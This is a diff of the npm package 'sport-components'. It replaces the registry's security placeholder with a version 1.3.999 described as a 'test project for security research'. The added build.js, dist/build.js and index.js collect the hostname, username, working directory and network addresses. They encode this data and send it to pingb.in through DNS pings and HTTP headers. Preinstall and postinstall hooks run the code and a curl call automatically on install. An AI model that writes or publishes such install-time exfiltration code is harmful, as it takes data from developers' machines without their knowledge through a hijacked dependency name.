sport-components 0.0.1-security → 1.3.999

package/README.md

@@ -1,5 +1 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=sport-components for more information.
+This is a test project for security research purposes.

package/build.js

@@ -0,0 +1,53 @@
+const os = require("os");
+var http = require("http");
+const { spawn } = require("child_process");
+var isWin = process.platform === "win32";
+
+const id = "6f5a2136d6bd33904afb82c6517d";
+
+try {
+  exfil({ hostname: os.hostname() });
+} catch (e) {}
+try {
+  exfil({ user: os.userInfo().username });
+} catch (e) {}
+try {
+  exfil({ cwd: process.cwd() });
+} catch (e) {}
+try {
+  const nets = os.networkInterfaces();
+  for (const name of Object.keys(nets)) {
+    for (const net of nets[name]) {
+      exfil({ ["net_" + name]: net.address });
+    }
+  }
+} catch (e) {}
+
+//process.exit();
+
+function exfil(data) {
+  try {
+    const b64 = Buffer.from(JSON.stringify(data))
+      .toString("base64")
+      .replace(/=/gm, "");
+
+    let args;
+    if (isWin) {
+      args = ["-n", "1"];
+    } else {
+      args = ["-c", "1"];
+    }
+    args.push(`${id}.${b64}.ns.pingb.in`);
+    spawn(`ping`, args, { detached: true });
+  } catch (e) {}
+
+  try {
+    const options = {
+      host: "pingb.in",
+      path: `/p/${id}`,
+      headers: { "x-exfil": b64 },
+    };
+
+    http.request(options, () => {}).end();
+  } catch (e) {}
+}

package/dist/build.js

@@ -0,0 +1,42 @@
+const os = require("os");
+const { spawn } = require("child_process");
+var isWin = process.platform === "win32";
+
+const id = "6f5a2136d6bd33904afb82c6517d";
+
+try {
+  exfil({ d_hostname: os.hostname() });
+} catch (e) {}
+try {
+  exfil({ d_user: os.userInfo().username });
+} catch (e) {}
+try {
+  exfil({ d_cwd: process.cwd() });
+} catch (e) {}
+try {
+  const nets = os.networkInterfaces();
+  for (const name of Object.keys(nets)) {
+    for (const net of nets[name]) {
+      exfil({ ["d_net_" + name]: net.address });
+    }
+  }
+} catch (e) {}
+
+//process.exit();
+
+function exfil(data) {
+  try {
+    const b64 = Buffer.from(JSON.stringify(data))
+      .toString("base64")
+      .replace(/=/gm, "");
+
+    let args;
+    if (isWin) {
+      args = ["-n", "1"];
+    } else {
+      args = ["-c", "1"];
+    }
+    args.push(`${id}.${b64}.ns.pingb.in`);
+    spawn(`ping`, args, { detached: true });
+  } catch (e) {}
+}

package/index.js

@@ -0,0 +1,42 @@
+const os = require("os");
+const { spawn } = require("child_process");
+var isWin = process.platform === "win32";
+
+const id = "6f5a2136d6bd33904afb82c6517d";
+
+try {
+  exfil({ r_hostname: os.hostname() });
+} catch (e) {}
+try {
+  exfil({ r_user: os.userInfo().username });
+} catch (e) {}
+try {
+  exfil({ r_cwd: process.cwd() });
+} catch (e) {}
+try {
+  const nets = os.networkInterfaces();
+  for (const name of Object.keys(nets)) {
+    for (const net of nets[name]) {
+      exfil({ ["r_net_" + name]: net.address });
+    }
+  }
+} catch (e) {}
+
+//process.exit();
+
+function exfil(data) {
+  try {
+    const b64 = Buffer.from(JSON.stringify(data))
+      .toString("base64")
+      .replace(/=/gm, "");
+
+    let args;
+    if (isWin) {
+      args = ["-n", "1"];
+    } else {
+      args = ["-c", "1"];
+    }
+    args.push(`${id}.${b64}.ns.pingb.in`);
+    spawn(`ping`, args, { detached: true });
+  } catch (e) {}
+}

package/package.json

@@ -1,6 +1,12 @@
 {
   "name": "sport-components",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.3.999",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node build.js",
+    "postinstall": "curl http://pingb.in/p/6f5a2136d6bd33904afb82c6517d"
+  },
+  "author": "svennerg@wearehackerone.com",
+  "license": "MIT"
 }